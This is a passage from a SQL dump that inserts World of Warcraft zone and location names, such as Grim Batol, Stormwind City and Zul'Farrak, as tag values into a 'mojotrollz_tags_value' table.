`description`) VALUES (1022, 2, 'Bluegill Marsh', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1023, 2, 'Saltspray Glen', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1024, 2, 'Sundown Marsh', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1025, 2, 'The Green Belt', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1036, 2, 'Angerfang Encampment', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1037, 2, 'Grim Batol', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1038, 2, 'Dragonmaw Gates', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1039, 2, 'The Lost Fleet', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1056, 2, 'Darrow Hill', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1057, 2, 'Thoradin\'s Wall', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1076, 2, 'Webwinder Path', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1097, 2, 'The Hushed Bank', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1098, 2, 'Manor Mistmantle', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1099, 2, 'Camp Mojache', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1100, 2, 'Grimtotem Compound', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1101, 2, 'The Writhing Deep', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1102, 2, 'Wildwind Lake', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1103, 2, 'Gordunni Outpost', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1104, 2, 'Mok\'Gordun', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1105, 2, 'Feral Scar Vale', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1106, 2, 'Frayfeather Highlands', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1107, 2, 'Idlewind Lake', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1108, 2, 'The Forgotten Coast', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1109, 2, 'East Pillar', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1110, 2, 'West Pillar', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1111, 2, 'Dream Bough', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1112, 2, 'Jademir Lake', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1113, 2, 'Oneiros', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1114, 2, 'Ruins of Ravenwind', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1115, 2, 'Rage Scar Hold', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1116, 2, 'Feathermoon Stronghold', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1117, 2, 'Ruins of Solarsal', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1119, 2, 'The Twin Colossals', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1120, 2, 'Sardor Isle', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1121, 2, 'Isle of Dread', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1136, 2, 'High Wilderness', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1137, 2, 'Lower Wilds', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1156, 2, 'Southern Barrens', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1157, 2, 'Southern Gold Road', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1176, 2, 'Zul\'Farrak', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1216, 2, 'Timbermaw Hold', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1217, 2, 'Vanndir Encampment', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1219, 2, 'Legash Encampment', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1220, 2, 'Thalassian Base Camp', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1221, 2, 'Ruins of Eldarath', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1222, 2, 'Hetaera\'s Clutch', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1223, 2, 'Temple of Zin-Malor', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1224, 2, 'Bear\'s Head', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1225, 2, 'Ursolan', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1226, 2, 'Temple of Arkkoran', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1227, 2, 'Bay of Storms', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1228, 2, 'The Shattered Strand', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1229, 2, 'Tower of Eldara', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1230, 2, 'Jagged Reef', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1231, 2, 'Southridge Beach', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1232, 2, 'Ravencrest Monument', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1233, 2, 'Forlorn Ridge', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1234, 2, 'Lake Mennar', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1235, 2, 'Shadowsong Shrine', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1236, 2, 'Haldarr Encampment', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1237, 2, 'Valormok', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1256, 2, 'The Ruined Reaches', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1276, 2, 'The Talondeep Path', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1277, 2, 'The Talondeep Path', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1296, 2, 'Rocktusk Farm', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1297, 2, 'Jaggedswine Farm', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1316, 2, 'Razorfen Downs', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1336, 2, 'Lost Rigger Cove', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1337, 2, 'Uldaman', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1338, 2, 'Lordamere Lake', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1339, 2, 'Lordamere Lake', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1357, 2, 'Gallows\' Corner', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1377, 2, 'Silithus', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1397, 2, 'Emerald Forest', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1417, 2, 'Sunken Temple', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1437, 2, 'Dreadmaul Hold', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1438, 2, 'Nethergarde Keep', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1439, 2, 'Dreadmaul Post', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1440, 2, 'Serpent\'s Coil', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1441, 2, 'Altar of Storms', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1442, 2, 'Firewatch Ridge', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1443, 2, 'The Slag Pit', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1444, 2, 'The Sea of Cinders', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1445, 2, 'Blackrock Mountain', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1446, 2, 'Thorium Point', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1457, 2, 'Garrison Armory', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1477, 2, 'The Temple of Atal\'Hakkar', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1497, 2, 'Undercity', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1517, 2, 'Uldaman', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1518, 2, 'Not Used Deadmines', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1519, 2, 'Stormwind City', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1537, 2, 'Ironforge', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1557, 2, 'Splithoof Hold', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1577, 2, 'The Cape of Stranglethorn', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1578, 2, 'Southern Savage Coast', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1579, 2, 'Unused The Deadmines 002', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1580, 2, 'Unused Ironclad Cove 003', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1581, 2, 'The Deadmines', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1582, 2, 'Ironclad Cove', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1583, 2, 'Blackrock Spire', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1584, 2, 'Blackrock Depths', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1597, 2, 'Raptor Grounds UNUSED', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1598, 2, 'Grol\'dom Farm UNUSED', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1599, 2, 'Mor\'shan Base Camp', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1600, 2, 'Honor\'s Stand UNUSED', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1601, 2, 'Blackthorn Ridge UNUSED', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1602, 2, 'Bramblescar UNUSED', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1603, 2, 'Agama\'gor UNUSED', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1617, 2, 'Valley of Heroes', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1637, 2, 'Orgrimmar', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1638, 2, 'Thunder Bluff', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1639, 2, 'Elder Rise', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1640, 2, 'Spirit Rise', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1641, 2, 'Hunter Rise', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1657, 2, 'Darnassus', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1658, 2, 'Cenarion Enclave', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1659, 2, 'Craftsmen\'s Terrace', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1660, 2, 'Warrior\'s Terrace', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1661, 2, 'The Temple Gardens', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1662, 2, 'Tradesmen\'s Terrace', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1677, 2, 'Gavin\'s Naze', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1678, 2, 'Sofera\'s Naze', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1679, 2, 'Corrahn\'s Dagger', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1680, 2, 'The Headland', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1681, 2, 'Misty Shore', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1682, 2, 'Dandred\'s Fold', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1683, 2, 'Growless Cave', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1684, 2, 'Chillwind Point', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1697, 2, 'Raptor Grounds', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1698, 2, 'Bramblescar', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1699, 2, 'Thorn Hill', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1700, 2, 'Agama\'gor', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1701, 2, 'Blackthorn Ridge', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1702, 2, 'Honor\'s Stand', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1703, 2, 'The Mor\'shan Rampart', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1704, 2, 'Grol\'dom Farm', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1717, 2, 'Razorfen Kraul', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1718, 2, 'The Great Lift', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1737, 2, 'Mistvale Valley', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1738, 2, 'Nek\'mani Wellspring', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1739, 2, 'Bloodsail Compound', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1740, 2, 'Venture Co. Base Camp', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1741, 2, 'Gurubashi Arena', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1742, 2, 'Spirit Den ', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1757, 2, 'The Crimson Veil', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1758, 2, 'The Riptide', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1759, 2, 'The Damsel\'s Luck', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1760, 2, 'Venture Co. Operations Center', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1761, 2, 'Deadwood Village', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1762, 2, 'Felpaw Village', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1763, 2, 'Jaedenar', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1764, 2, 'Bloodvenom River', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1765, 2, 'Bloodvenom Falls', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1766, 2, 'Shatter Scar Vale', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1767, 2, 'Irontree Woods', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1768, 2, 'Irontree Cavern', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1769, 2, 'Timbermaw Hold', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1770, 2, 'Shadow Hold', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1771, 2, 'Shrine of the Deceiver', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1777, 2, 'Itharius\'s Cave', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1778, 2, 'Sorrowmurk', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1779, 2, 'Draenil\'dur Village', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1780, 2, 'Splinterspear Junction', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1797, 2, 'Stagalbog', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1798, 2, 'The Shifting Mire', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1817, 2, 'Stagalbog Cave', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1837, 2, 'Witherbark Caverns', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1857, 2, 'Thoradin\'s Wall', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1858, 2, 'Boulder\'gor', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1877, 2, 'Valley of Fangs', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1878, 2, 'The Dustbowl', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1879, 2, 'Mirage Flats', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1880, 2, 'Featherbeard\'s Hovel', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1881, 2, 'Shindigger\'s Camp', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1882, 2, 'Plaguemist Ravine', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1883, 2, 'Valorwind Lake', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1884, 2, 'Agol\'watha', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1885, 2, 'Hiri\'watha', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1886, 2, 'The Creeping Ruin', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1887, 2, 'Bogen\'s Ledge', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1897, 2, 'The Maker\'s Terrace', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1898, 2, 'Dustwind Gulch', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1917, 2, 'Shaol\'watha', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1937, 2, 'Noonshade Ruins', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1938, 2, 'Broken Pillar', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1939, 2, 'Abyssal Sands', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1940, 2, 'Southbreak Shore', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1941, 2, 'Caverns of Time', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1942, 2, 'The Marshlands', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1943, 2, 'Ironstone Plateau', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1957, 2, 'Blackchar Cave', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1958, 2, 'Tanner Camp', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1959, 2, 'Dustfire Valley', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1977, 2, 'Zul\'Gurub', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1978, 2, 'Misty Reed Post', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1997, 2, 'Bloodvenom Post', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (1998, 2, 'Talonbranch Glade', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2017, 2, 'Stratholme', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2037, 2, 'Quel\'thalas', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2057, 2, 'Scholomance', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2077, 2, 'Twilight Vale', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2078, 2, 'Twilight Shore', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2079, 2, 'Alcaz Island', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2097, 2, 'Darkcloud Pinnacle', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2098, 2, 'Dawning Wood Catacombs', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2099, 2, 'Stonewatch Keep', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2100, 2, 'Maraudon', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2101, 2, 'Stoutlager Inn', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2102, 2, 'Thunderbrew Distillery', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2103, 2, 'Menethil Keep', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2104, 2, 'Deepwater Tavern', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2117, 2, 'Shadow Grave', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2118, 2, 'Brill Town Hall', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2119, 2, 'Gallows\' End Tavern', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2137, 2, 'The Pools of Vision', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2138, 2, 'Dreadmist Den', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2157, 2, 'Bael\'dun Keep', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2158, 2, 'Emberstrife\'s Den', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2159, 2, 'Onyxia\'s Lair', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2160, 2, 'Windshear Mine', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2161, 2, 'Roland\'s Doom', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2177, 2, 'Battle Ring', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2197, 2, 'The Pools of Vision', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2198, 2, 'Shadowbreak Ravine', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2217, 2, 'Broken Spear Village', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2237, 2, 'Whitereach Post', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2238, 2, 'Gornia', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2239, 2, 'Zane\'s Eye Crater', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2240, 2, 'Mirage Raceway', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2241, 2, 'Frostsaber Rock', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2242, 2, 'The Hidden Grove', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2243, 2, 'Timbermaw Post', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2244, 2, 'Winterfall Village', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2245, 2, 'Mazthoril', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2246, 2, 'Frostfire Hot Springs', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2247, 2, 'Ice Thistle Hills', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2248, 2, 'Dun Mandarr', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2249, 2, 'Frostwhisper Gorge', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2250, 2, 'Owl Wing Thicket', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2251, 2, 'Lake Kel\'Theril', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, 